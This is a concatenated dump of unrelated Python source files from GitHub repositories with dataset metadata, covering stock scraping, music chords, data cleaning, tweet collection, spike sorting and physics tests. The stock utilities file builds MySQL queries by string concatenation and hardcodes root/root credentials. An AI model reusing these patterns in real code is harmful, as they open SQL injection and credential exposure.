action.read()[0] if action else {}\n domain = expression.AND([\n [(\"id\", \"in\", issues.ids)],\n safe_eval(action.domain or \"[]\")])\n action_dict.update({\"domain\": domain})\n return action_dict\n","repo_name":"avanzosc/education","sub_path":"issue_education_kanban_view/wizard/wiz_create_assistance_issue.py","file_name":"wiz_create_assistance_issue.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"18775243740","text":"\"\"\"empty message\n\nRevision ID: daf4196036e5\nRevises: 61ba38623d87\nCreate Date: 2019-01-03 16:52:47.117880\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'daf4196036e5'\ndown_revision = '61ba38623d87'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('data',\n sa.Column('data_id', sa.Integer(), nullable=False),\n sa.Column('value', sa.Integer(), nullable=True),\n sa.Column('created_at', sa.TIMESTAMP(), nullable=True),\n sa.Column('sensor_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['sensor_id'], ['sensor.sensor_id'], ),\n sa.PrimaryKeyConstraint('data_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('data')\n # ### end Alembic commands ###\n","repo_name":"MaximePillon/iot_server","sub_path":"migrations/versions/daf4196036e5_.py","file_name":"daf4196036e5_.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70570976805","text":"# Source: https://programmers.co.kr/learn/courses/30/lessons/64064#\n\nimport re\nfrom itertools import product\n\ndef solution(user_id, banned_id):\n candidates_id = []\n\n for ban in banned_id:\n candidates = []\n ban_re = re.compile(ban.replace(\"*\", \"\\w\"))\n\n for user in user_id:\n if len(user) == len(ban) and ban_re.match(user) is not None:\n candidates.append(user)\n\n candidates_id.append(candidates)\n\n candidates_product = list(product(*candidates_id))\n new_candidates = []\n\n for candidate_tuple in candidates_product:\n if len(candidate_tuple) == len(set(candidate_tuple)):\n new_candidates.append(candidate_tuple)\n\n answer_set = set()\n for candidate in new_candidates:\n candidate_list = sorted(list(candidate))\n answer_set.add(tuple(candidate_list))\n \n return len(answer_set)\n \n","repo_name":"jeanP-tech/Algorithms","sub_path":"불량 사용자.py","file_name":"불량 사용자.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23485315292","text":"#!/usr/bin/env python\n\n# check if product is present for each CDS in a genbank file (arg1)\n\n\nimport sys\nfrom Bio import SeqIO\n\n\nCDS_missing = []\nRNA_missing = []\n\n\nwith open(sys.argv[1], 'r') as gbfile:\n\tgenbanks = SeqIO.parse(gbfile, 'genbank')\n\tfor gb in genbanks:\n\t\tfor feature in gb.features:\n\t\t\tif feature.type == 'CDS':\n\t\t\t\tif 'product' not in feature.qualifiers:\n\t\t\t\t\tCDS_missing.append(feature.qualifiers['gene'][0])\n\t\t\telif 'RNA' in feature.type:\n\t\t\t\tif 'product' not in feature.qualifiers:\n\t\t\t\t\tRNA_missing.append(feature.qualifiers['gene'][0])\n\n#print('Features missing product qualifier:')\n#print('\\tCDS: ' + '\\t'.join(CDS_missing))\n#print('\\tRNA: ' + '\\t'.join(RNA_missing))\nfor item in CDS_missing:\n\tprint(item)\nfor item in RNA_missing:\n\tprint(item)\n","repo_name":"bmichanderson/scripts","sub_path":"check_product.py","file_name":"check_product.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23754253510","text":"#coding=utf-8\r\n\r\nimport pymysql\r\nimport traceback\r\nimport codecs\r\nimport os\r\n\r\nimport urllib.parse\r\nimport urllib.request\r\nimport json\r\nimport datetime\r\n\r\ndef reconnect_mysql():\r\n conn= pymysql.connect(\r\n host='localhost',\r\n port = 3306,\r\n user='root',\r\n passwd='root',\r\n db ='stock',\r\n charset=\"utf8\",)\r\n cur = conn.cursor()\r\n return conn,cur\r\n\r\ndef get_sohu_stock_data(code, start_day, end_day):\r\n '''Fetch Sohu stock data''' \r\n user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'\r\n headers = { 'User-Agent' : user_agent }\r\n url='http://q.stock.sohu.com/hisHq'\r\n param = \"code=\"+code+\"&end=\"+end_day+\"&start=\"+start_day\r\n url += \"?\"+param\r\n req = urllib.request.Request(url)\r\n res = urllib.request.urlopen(req)\r\n\r\n res = res.read().decode('utf-8')\r\n print(res)\r\n if len(res)< 30:\r\n return \"\"\r\n resj = json.loads(res)\r\n print(resj)\r\n if resj[0]['status'] != 0:\r\n return \"\"\r\n return resj[0]\r\n\r\ndef get_all_stock_code():\r\n 
'''Probe roughly all candidate stock codes and write the valid ones to a file'''\r\n start=\"20171024\" \r\n end=\"20171024\"\r\n code_list = []\r\n for c in range(1000):\r\n code = \"cn_000\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n code = \"cn_002\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n\r\n code = \"cn_300\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n\r\n code = \"cn_600\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n\r\n code = \"cn_601\" + \"%03d\"%c\r\n print(code)\r\n result = get_sohu_stock_data(code, start, end)\r\n if result != \"\":\r\n code_list.append(code)\r\n\r\n with codecs.open(\"code.txt\", 'w', 'utf-8') as fw:\r\n for c in code_list:\r\n fw.write(c + \"\\n\")\r\n\r\ndef read_stock_code():\r\n ''' Read the stock codes from file and return them as a list'''\r\n result_list = []\r\n with codecs.open(\"code.txt\", 'r', 'utf-8') as fr:\r\n for line in fr:\r\n result_list.append(line.strip())\r\n return result_list\r\n\r\n\r\n\r\n\r\ndef str2datetime(date_str):\r\n ''' \r\n Convert a string into a datetime;\r\n the string must look like 2017-10-10\r\n '''\r\n oneday = datetime.datetime.strptime(date_str, '%Y-%m-%d')\r\n return oneday\r\n\r\ndef before_n_day(date, before_n):\r\n '''\r\n The day n days before a given date, returned as a datetime\r\n '''\r\n before_datetime = datetime.timedelta(days=before_n)\r\n oneday = date - before_datetime\r\n return oneday\r\n\r\ndef after_n_day(date, after_n):\r\n '''\r\n The day n days after a given date, returned as a datetime\r\n '''\r\n after_datetime = datetime.timedelta(days=after_n)\r\n oneday = date + after_datetime\r\n return oneday\r\n\r\ndef datetime2str(date):\r\n '''\r\n Convert a datetime into a string\r\n '''\r\n return date.strftime('%Y-%m-%d')\r\n\r\ndef read_one_stock_data(code, start_day, end_day):\r\n '''\r\n Read one stock's rows for a given date range\r\n '''\r\n\r\n conn,cur = reconnect_mysql()\r\n '''\r\n sql = \"select Id,name,day,open,close, change_price, change_ratio, low, high, \" + \\\r\n \"unknow1, unknow2, unknow3 from dayinfo where name='\" + code + \"' and day>='\"+start_day+\"' and day<='\"+end_day+\"' order by day asc\"\r\n '''\r\n sql = \"select * from dayinfo where name='\" + code + \"' and day>='\"+start_day+\"' and day<='\"+end_day+\"' order by day asc\"\r\n try:\r\n cur.execute(sql)\r\n result = cur.fetchall()\r\n except :\r\n print(\"error %s\" % sql)\r\n return \"\"\r\n return result\r\n\r\ndef get_one_stock_close_price_avg(code, start_day, end_day):\r\n '''\r\n Get the mean and variance of one stock's closing price over a date range\r\n '''\r\n stock_data_list = read_one_stock_data(code, start_day, end_day)\r\n all_price = 0 \r\n for stock_data in stock_data_list:\r\n close_price = stock_data[4]\r\n all_price += float(close_price)\r\n avg_price = all_price/len(stock_data_list)\r\n\r\n # variance\r\n squre_sum = 0\r\n for stock_data in stock_data_list:\r\n close_price = stock_data[4]\r\n squre_sum += (close_price - avg_price) * (close_price - avg_price)\r\n var_price = squre_sum/ len(stock_data_list)\r\n return avg_price, var_price\r\n\r\n\r\nif __name__==\"__main__\":\r\n get_all_stock_code()","repo_name":"thewintersun/stock_analytics","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8368924760","text":"from __future__ import annotations\n\nimport functools\nimport
itertools\nimport random\nfrom typing import TYPE_CHECKING\nfrom typing import Any\nfrom typing import ClassVar\n\nfrom musiclib import config\nfrom musiclib.note import Note\nfrom musiclib.note import SpecificNote\nfrom musiclib.noterange import NoteRange\nfrom musiclib.noteset import NoteSet\nfrom musiclib.svg.piano import Piano\nfrom musiclib.util.cache import Cached\n\nif TYPE_CHECKING:\n from collections.abc import Iterator\n\n\nclass Chord(NoteSet):\n \"\"\"\n Chord is a set of notes with a root note\n \"\"\"\n intervals_to_name: ClassVar[dict[frozenset[int], str]] = {\n # triads\n frozenset({0, 4, 7}): 'major',\n frozenset({0, 3, 7}): 'minor',\n frozenset({0, 3, 6}): 'diminished',\n # 7th\n frozenset({0, 4, 7, 11}): 'maj7',\n frozenset({0, 4, 7, 10}): '7',\n frozenset({0, 3, 7, 10}): 'min7',\n frozenset({0, 3, 6, 10}): 'half-dim7',\n frozenset({0, 3, 6, 9}): 'dim7',\n # 6th\n frozenset({0, 4, 7, 9}): '6',\n frozenset({0, 3, 7, 9}): 'm6',\n # etc\n frozenset({0, 4, 8}): 'aug',\n frozenset({0, 2, 7}): 'sus2',\n frozenset({0, 5, 7}): 'sus4',\n }\n name_to_intervals: ClassVar[dict[str, frozenset[int]]] = {v: k for k, v in intervals_to_name.items()}\n root: Note\n name: str\n\n def __init__(self, notes: frozenset[Note], *, root: Note) -> None:\n if root is None:\n raise TypeError('Chord requires root note. Use NoteSet if there is no root')\n super().__init__(notes, root=root)\n\n def _repr_svg_(self, **kwargs: Any) -> str:\n kwargs.setdefault('title', f'{self.root.name} {self.name}')\n return super()._repr_svg_(**kwargs)\n\n\nclass SpecificChord(Cached):\n def __init__(\n self,\n notes: frozenset[SpecificNote],\n *,\n root: str | Note | None = None,\n ) -> None:\n if not isinstance(notes, frozenset):\n raise TypeError(f'expected frozenset, got {type(notes)}')\n\n if isinstance(root, str):\n root = Note(root)\n\n notes_abstract = SpecificNote.to_abstract(notes)\n if root is not None and root not in notes_abstract:\n raise KeyError('root should be one of notes')\n\n self.notes = notes\n self.root = root\n self.abstract = Chord(notes_abstract, root=root) if root is not None else NoteSet(notes_abstract)\n self.root_specific = frozenset(note for note in notes if note.abstract == root) if root is not None else frozenset()\n\n self.notes_ascending = tuple(sorted(notes))\n self.intervals = tuple(note - self.notes_ascending[0] for note in self.notes_ascending) # from lowest note\n self.key = self.notes, self.root\n\n @classmethod\n def random(cls, n_notes: int | None = None, octaves: tuple[int, ...] 
= (3, 4, 5)) -> SpecificChord:\n if n_notes is None:\n n_notes = random.randint(2, 5)\n notes_space = tuple(\n SpecificNote(note, octave)\n for note, octave in itertools.product(config.chromatic_notes, octaves)\n )\n notes = frozenset(random.sample(notes_space, n_notes))\n return cls(notes)\n\n @classmethod\n def from_str(cls, string: str) -> SpecificChord:\n notes_, _, root_ = string.partition('/')\n root = Note(root_) if root_ else None\n notes_2 = notes_.split('_')\n if len(notes_2) != len(set(notes_2)):\n raise NotImplementedError('SpecificChord_s with non unique notes are not supported')\n notes = frozenset(SpecificNote.from_str(note) for note in notes_2)\n return cls(notes, root=root)\n\n def notes_combinations(self) -> Iterator[tuple[SpecificNote, SpecificNote]]:\n yield from itertools.combinations(self.notes_ascending, 2)\n\n def find_intervals(self, interval: int) -> tuple[tuple[SpecificNote, SpecificNote], ...]:\n return tuple((n, m) for n, m in self.notes_combinations() if abs(m - n) == interval)\n\n def __len__(self) -> int:\n return len(self.notes)\n\n def __getitem__(self, item: int) -> SpecificNote:\n return self.notes_ascending[item]\n\n def __iter__(self) -> Iterator[SpecificNote]:\n return iter(self.notes_ascending)\n\n def __contains__(self, item: object) -> bool:\n if not isinstance(item, SpecificNote):\n return NotImplemented\n return item in self.notes\n\n def __repr__(self) -> str:\n x = '_'.join(repr(note) for note in self.notes_ascending)\n if self.root is not None:\n return f'{x}/{self.root.name}'\n return x\n\n def __eq__(self, other: object) -> bool:\n if not isinstance(other, SpecificChord):\n return NotImplemented\n return self.key == other.key\n\n def __hash__(self) -> int:\n return hash(self.key)\n\n def __sub__(self, other: SpecificChord) -> int:\n return sum(abs(a - b) for a, b in zip(self, other, strict=True))\n\n def __add__(self, other: int) -> SpecificChord:\n \"\"\"transpose\"\"\"\n if not isinstance(other, int):\n raise TypeError('only adding integers is allowed (transposition)')\n root = self.root + other if self.root is not None else None\n return SpecificChord(frozenset(note + other for note in self), root=root)\n\n @functools.cached_property\n def transposed_to_C0(self) -> SpecificChord:\n return self + (SpecificNote('C', 0) - self[0])\n\n def _repr_svg_(self, **kwargs: Any) -> str:\n kwargs.setdefault('noterange', NoteRange(self[0], self[-1]) if self.notes else None)\n kwargs.setdefault('classes', ('card',))\n kwargs.setdefault('title', repr(self))\n kwargs.setdefault('note_colors', dict.fromkeys(self.notes, config.RED))\n kwargs.setdefault('squares', {note: {'text': str(note), 'text_size': '8'} for note in self})\n return Piano(**kwargs)._repr_svg_()\n\n def __getnewargs_ex__(self) -> tuple[tuple[frozenset[SpecificNote]], dict[str, Note | None]]:\n return (self.notes,), {'root': self.root}\n","repo_name":"tandav/musiclib","sub_path":"src/musiclib/chord.py","file_name":"chord.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"35481921648","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer, ValidationError\n\nfrom core.models import Category, Site\n\n\nclass CategorySerializer(ModelSerializer):\n class Meta:\n fields = (\"id\", \"name\")\n model = Category\n\n\nclass SiteSerializer(serializers.Serializer):\n id = serializers.IntegerField(label=\"ID\", read_only=True)\n category = 
serializers.CharField()\n url = serializers.URLField()\n\n def validate_category(self, value):\n if not Category.objects.filter(name=value):\n raise ValidationError(\"Invalid Category.\")\n return value\n","repo_name":"nixocio/savite","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"27900178259","text":"from sklearn import preprocessing\nimport pandas as pd\n\n\ndef fill_na_mean(columns, dataframe):\n \"\"\"\n :param columns: columns of which na values have to be filled with mean\n :param dataframe: dataframe of interest\n \"\"\"\n for column in columns:\n dataframe[column].fillna(int(dataframe[column].mean()), inplace=True)\n\n\ndef fill_na_zero(columns, dataframe):\n \"\"\"\n :param columns: columns of which na values have to be filled with zero\n :param dataframe: dataframe of interest\n \"\"\"\n for column in columns:\n dataframe[column].fillna(\"0\", inplace=True)\n\n\ndef from_categorical_to_numerical(dataframe):\n _list = []\n for col in dataframe.columns:\n if type(dataframe[col][0]) == type('str'):\n _list.append(col)\n\n dataframe[_list] = dataframe[_list].astype('str')\n\n le = preprocessing.LabelEncoder()\n for li in _list:\n le.fit(list(set(dataframe[li])))\n dataframe[li] = le.transform(dataframe[li])\n\ndef subset_by_iqr(df, column, whisker_width=1.5):\n \"\"\"Remove outliers from a dataframe by column, including optional\n whiskers, removing rows for which the column value is\n less than Q1-1.5IQR or greater than Q3+1.5IQR.\n Args:\n df (`:obj:pd.DataFrame`): A pandas dataframe to subset\n column (str): Name of the column to calculate the subset from.\n whisker_width (float): Optional, loosen the IQR filter by a\n factor of `whisker_width` * IQR.\n Returns:\n (`:obj:pd.DataFrame`): Filtered dataframe\n \"\"\"\n # Calculate Q1, Q3 and IQR\n q1 = df[column].quantile(0.25)\n q3 = df[column].quantile(0.75)\n iqr = q3 - q1\n # Apply filter with respect to IQR, including optional whiskers\n filter = (df[column] >= q1 - whisker_width * iqr) & (df[column] <= q3 + whisker_width * iqr)\n return df.loc[filter]\n\ndef return_submission_csv(prediction):\n id_list = range(1461, 2920)\n df = pd.DataFrame({'Id': id_list, 'SalePrice': prediction.flatten()})\n df = df.set_index('Id')\n df.to_csv('data/log_submission_test.csv')\n return df\n","repo_name":"thom145/HousePrediction","sub_path":"CleanData.py","file_name":"CleanData.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37103983667","text":"import tweepy\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport subprocess\nimport json\nimport os\nimport sys\n\nconfigjson = {}\narg = sys.argv\n# read config file\nwith open(arg[1],'r') as configfile:\n\tfor line in configfile:\n\t\tconfigjson = json.loads(line)\n\n# setup api\nauth = OAuthHandler(configjson['consumer_key'],configjson['consumer_secret'])\nauth.set_access_token(configjson['access_token'],configjson['access_secret'])\n\napi = tweepy.API(auth)\nkeywords = arg[3].split(',')\ntopic = arg[2]\n# check if topic folder exists\nif not os.path.exists(topic):\n\tos.makedirs(topic)\n# change active directory to topic directory\nos.chdir(topic)\n\nglobal counter\ncounter = 0\n\ntwitter_dump_file = open(topic+'.tweet','a')\n\nclass MyListener(StreamListener):\n\tdef 
on_data(self,data):\n\t\ttry:\n\t\t\t# we are interested in English-language tweets only\n\t\t\tjsondata = json.loads(data)\n\t\t\tif 'lang' in jsondata.keys() and jsondata['lang']=='en':\n\t\t\t\t# we are interested in data that have cascade\n\t\t\t\t# expanded_url, user_mentions, retweeted_status, quoted_status, in_reply_to_status_id\n\t\t\t\tif len(jsondata['entities']['urls'])>0 \\\n\t\t\t\tor len(jsondata['entities']['user_mentions']) > 0 \\\n\t\t\t\tor jsondata['in_reply_to_status_id'] is not None \\\n\t\t\t\tor jsondata['is_quote_status'] \\\n\t\t\t\tor 'retweeted_status' in jsondata.keys():\n\t\t\t\t\ttwitter_dump_file.writelines(data)\n#\t\t\tglobal counter\n#\t\t\tif(counter>10000):\n#\t\t\t\tcounter=0\n#\t\t\t\tprint('flush file')\n#\t\t\tcounter+=1\n\t\texcept BaseException as e:\n\t\t\tprint('Error on data {}'.format(str(e)))\n\t\treturn True\n\tdef on_error(self,status):\n\t\tprint(status)\n\t\treturn True\n\n# stream\ntwitter_stream = Stream(auth,MyListener())\n# follow user stream\n# twitter_stream.filter(follow = ['292432955'])\n# tracking hashtag\ntwitter_stream.filter(track = keywords)\n\n","repo_name":"BravoChi/CS511_Project_17Spring","sub_path":"python-twitter/tweet-dump-all.py","file_name":"tweet-dump-all.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41542222733","text":"# -*- coding: utf-8 -*-\n# +\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef plotSignal(signal, sampling_freq, from_in_s=0, to_in_s=None, show=True):\n \"\"\"\n Plots data from a single channel\n\n :param signal: The signal as a 1-dimensional numpy array (assumed to be in volts)\n :param sampling_freq: Sampling frequency in Hz\n :param from_in_s: The start timestamp of the plot (0 <= from_in_s < to_in_s). Default: 0\n :param to_in_s: The end timestamp of the plot (from_in_s < to_in_s <= duration). Default: None (= recording duration)\n :param show: If True (default), the plot is directly created. For further plotting, use show=False\n \"\"\"\n # get start and end index\n from_idx = max(0, int(from_in_s * sampling_freq))\n if to_in_s is None:\n to_idx = signal.shape[0]\n else:\n to_idx = min(signal.shape[0], int(to_in_s * sampling_freq))\n\n # timestamps for each sample, in seconds\n time_in_sec = np.arange(from_idx, to_idx) / sampling_freq\n\n # scale signal to µV (assumes the raw signal is in volts)\n signal_in_uV = signal[from_idx:to_idx] * 1e6\n\n # construct the plot\n _ = plt.figure(figsize=(20,6))\n _ = plt.plot(time_in_sec, signal_in_uV)\n _ = plt.xlabel('Time (s)')\n _ = plt.ylabel('Voltage (µV)')\n _ = plt.title('Channel signal')\n if show:\n plt.show()\n \n\ndef detect_threshold_crossings(signal, fs, threshold, dead_time):\n \"\"\"\n Detect threshold crossings in a signal with dead time and return them as an array\n\n The signal transitions from a sample above the threshold to a sample below the threshold for a detection and\n the last detection has to be more than dead_time apart from the current one.\n\n :param signal: The signal as a 1-dimensional numpy array\n :param fs: The sampling frequency in Hz\n :param threshold: The threshold for the signal\n :param dead_time: The dead time in seconds.\n \"\"\"\n dead_time_idx = dead_time * fs\n threshold_crossings = np.diff((signal <= threshold).astype(int) > 0).nonzero()[0]\n distance_sufficient = np.insert(np.diff(threshold_crossings) >= dead_time_idx, 0, True)\n while not np.all(distance_sufficient):\n # repeatedly remove all threshold crossings that violate the dead_time\n threshold_crossings = threshold_crossings[distance_sufficient]\n distance_sufficient = np.insert(np.diff(threshold_crossings) >= dead_time_idx, 0, True)\n return threshold_crossings\n\ndef get_next_minimum(signal, index, max_samples_to_search):\n \"\"\"\n Returns the index of the next minimum in the signal after an index\n\n :param signal: The signal as a 1-dimensional numpy array\n :param index: The scalar index\n :param max_samples_to_search: The number of samples to search for a minimum after the index\n \"\"\"\n search_end_idx = min(index + max_samples_to_search, signal.shape[0])\n min_idx = np.argmin(signal[index:search_end_idx])\n return index + min_idx\n\ndef align_to_minimum(signal, fs, threshold_crossings, search_range):\n \"\"\"\n Returns the index of the next negative spike peak for all threshold crossings\n\n :param signal: The signal as a 1-dimensional numpy array\n :param fs: The sampling frequency in Hz\n :param threshold_crossings: The array of indices where the signal crossed the detection threshold\n :param search_range: The maximum duration in seconds to search for the minimum after each crossing\n \"\"\"\n search_end = int(search_range*fs)\n aligned_spikes = [get_next_minimum(signal, t, search_end) for t in threshold_crossings]\n return np.array(aligned_spikes)\n\ndef extract_waveforms(signal, fs, spikes_idx, pre, post):\n \"\"\"\n Extract spike waveforms as signal cutouts around each spike index as a spikes x samples numpy array\n\n :param signal: The signal as a 1-dimensional numpy array\n :param fs: The sampling frequency in Hz\n :param spikes_idx: The sample 
index of all spikes as a 1-dim numpy array\n :param pre: The duration of the cutout before the spike in seconds\n :param post: The duration of the cutout after the spike in seconds\n \"\"\"\n cutouts = []\n pre_idx = int(pre * fs)\n post_idx = int(post * fs)\n for index in spikes_idx:\n if index-pre_idx >= 0 and index+post_idx <= signal.shape[0]:\n cutout = signal[(index-pre_idx):(index+post_idx)]\n cutouts.append(cutout)\n return np.stack(cutouts)\n\ndef plot_waveforms(cutouts, fs, pre, post, n=100, color='k', show=True):\n \"\"\"\n Plot an overlay of spike cutouts\n\n :param cutouts: A spikes x samples array of cutouts\n :param fs: The sampling frequency in Hz\n :param pre: The duration of the cutout before the spike in seconds\n :param post: The duration of the cutout after the spike in seconds\n :param n: The number of cutouts to plot, or None to plot all. Default: 100\n :param color: The line color as a pyplot line/marker style. Default: 'k'=black\n :param show: Set this to False to disable showing the plot. Default: True\n \"\"\"\n if n is None:\n n = cutouts.shape[0]\n n = min(n, cutouts.shape[0])\n time_in_ms = np.arange(-pre*1000, post*1000, 1e3/fs)\n if show:\n _ = plt.figure(figsize=(10,6))\n\n for i in range(n):\n _ = plt.plot(time_in_ms, cutouts[i,]*1e6, color, linewidth=1, alpha=0.3)\n _ = plt.xlabel('Time (ms)')\n _ = plt.ylabel('Voltage (µV)')\n _ = plt.title('Spike Waveforms')\n\n if show:\n plt.show()\n","repo_name":"BIPN145/SpikeSorting","sub_path":"spikesorting_helperfunctions.py","file_name":"spikesorting_helperfunctions.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23507768722","text":"import numpy as np\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\nt , l , dl=np.loadtxt('merenja3.txt' , unpack=True)\n\ndef fun(x,a,b,c):\n return a*x*x+b*x+c\n\nparametri, cov=curve_fit(fun, t, l , sigma=dl)\ngreske_parametara=np.sqrt(np.diag(cov))\n\nprint('Parameter a is:', parametri[0],'+/-', greske_parametara[0])\n# index zero picks the first of the fitted parameters, i.e. a\nprint('Parameter b is:', parametri[1], '+/-', greske_parametara[1])\nprint('Parameter c is:', parametri[2], '+/-', greske_parametara[2])\nx0=-parametri[1]/(2*parametri[0])\napsx0=-x0\ndx=(greske_parametara[1]/parametri[1]+greske_parametara[0]/parametri[0])*apsx0/2\nh=np.arctan(0.185/parametri[2])*180/np.pi\nlam=(14-(x0+700)/60)*15-30.5/60\ndlam=(greske_parametara[1]/(2*parametri[0])+(parametri[1]*greske_parametara[0]/(2*parametri[0]**2)))/4\nfi = 90+22.2-h\nprint(lam)\nprint(dlam)\nprint('shortest gnomon shadow length', x0,'+/-', dx)\n#print(dfi,'dasklfjas;ldkfhas;dkfhaspdlkfahso;jdfh')\n#print(x0, 'take this one!!!')\n#print('h is', h)\n#print('Geographic latitude is: ', fi,'.')\n#print('Geographic longitude is', lam, '+/-', dlam,'.')\nt=t-x0\n#print(x0, 'this is x0')\n\npar1, cov1=curve_fit(fun, t, l , sigma=dl)\ng1=np.sqrt(np.diag(cov1))\n\nx1=np.arange(-65, 60, 2)\ny1=fun(x1,par1[0],par1[1],par1[2])\nplt.plot(x1, y1 , '-r', label='fit')\nplt.errorbar(t ,l ,dl , fmt='o')\nplt.legend(loc='best')\nplt.xlabel('t[min]')\nplt.ylabel('l[m]')\nplt.xlim([-65,50])\nplt.title('Shadow length as a function of time')\nplt.show()\n\n\n\n\n\n","repo_name":"ispastlibrary/Titan","sub_path":"2015/AST1/vezbovni/Danica/gnomonDanica.py","file_name":"gnomonDanica.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"42124360349","text":"import unittest\nimport numpy as np\nimport sys\nsys.path.append('..')\nimport force_analysis # noqa\n\n\n# -------------------------------\n# force analysis tests\n# -------------------------------\nclass test_scale_box_coordinates(unittest.TestCase):\n\n def test_dims_mismatch_error(self):\n traj_xyz = np.ones((10, 8, 3))\n traj_dims = 100 + (np.random.rand(10, 3))\n ref_dims = 100 + np.random.rand(2)\n self.assertRaises(ValueError, force_analysis.scale_box_coordinates, traj_xyz, traj_dims, ref_dims)\n\n def test_all_3D_error(self):\n good_xyz, bad_xyz = np.ones((10, 5, 3)), np.ones((10, 5, 2))\n good_dims, bad_dims = np.ones((10, 3)), np.ones((10, 1))\n good_ref, bad_ref = np.ones((3)), np.ones((2))\n self.assertRaises(ValueError, force_analysis.scale_box_coordinates, good_xyz, good_dims, bad_ref)\n self.assertRaises(ValueError, force_analysis.scale_box_coordinates, good_xyz, bad_dims, good_ref)\n self.assertRaises(ValueError, force_analysis.scale_box_coordinates, bad_xyz, good_dims, good_ref)\n\n def test_scaling(self):\n traj_xyz = np.zeros((10, 5, 3)) + (15, 10, 5)\n traj_dims = np.zeros((10, 3)) + 3\n ref_dims = np.array((1, 6, 3))\n # dims are 3X, 0.5X and 1X reference. So should be 15 * 3, 10 * 0.5, 5 * 1\n scaled_coords = force_analysis.scale_box_coordinates(traj_xyz, traj_dims, ref_dims)\n self.assertTrue(all(scaled_coords[5, 0, :] == (45, 5, 5)))\n\n def test_coordinate_frame_multiplication(self):\n ref_xyz = np.ones((1, 10, 3))\n mult_xyz = force_analysis.multiply_coordinate_frame(ref_xyz, 15)\n self.assertSequenceEqual(mult_xyz.shape, (15, 10, 3))\n\n\nclass test_calc_vectors(unittest.TestCase):\n def test_coordinate_mismatch_exceptions(self):\n cp = np.ones((10, 20, 3))\n cd1 = np.ones((9, 20, 3)) # bad frame number\n cd2 = np.ones((10, 10, 3)) # bad particle number\n cd3 = np.ones((10, 20, 2)) # bad dimension number\n boxdims = np.ones((10, 3)) # correct\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cd1, boxdims)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cd2, boxdims)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cd3, boxdims)\n\n def test_coordinate_boxdim_mismatch_exceptions(self):\n cp = np.ones((10, 20, 3))\n boxdims = np.ones((9, 3)) # not enough frames\n boxdims2 = np.ones((10, 2)) # not enough dimensions\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cp, boxdims)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp, cp, boxdims2)\n\n def test_bad_input_dimension_exceptions(self):\n cp_too_few = np.ones((100, 3))\n cp_too_many = np.ones((100, 20, 3, 4))\n cp_good = np.ones((100, 20, 3))\n boxdims_too_few = np.ones(100)\n boxdims_too_many = np.ones((100, 3, 10))\n boxdims_good = np.ones((100, 3))\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp_too_few, cp_too_few, boxdims_good)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp_too_many, cp_too_many, boxdims_good)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp_good, cp_good, boxdims_too_few)\n self.assertRaises(ValueError, force_analysis.calc_vectors, cp_good, cp_good, boxdims_too_many)\n\n def test_for_correct_vectors(self):\n boxdims = np.array([[10, 10, 10], [9.5, 9.5, 9.5]]) # 2 frames, 3D\n p_low = np.ones((2, 2, 3)) # = 1\n p_high = np.ones((2, 2, 3)) + 8.4 # = 9.4\n p_mid = np.ones((2, 2, 3)) + 4 # = 5\n vecs_pos_no_pi = force_analysis.calc_vectors(p_mid, p_high, boxdims)\n vecs_neg_no_pi = force_analysis.calc_vectors(p_mid, p_low, boxdims)\n 
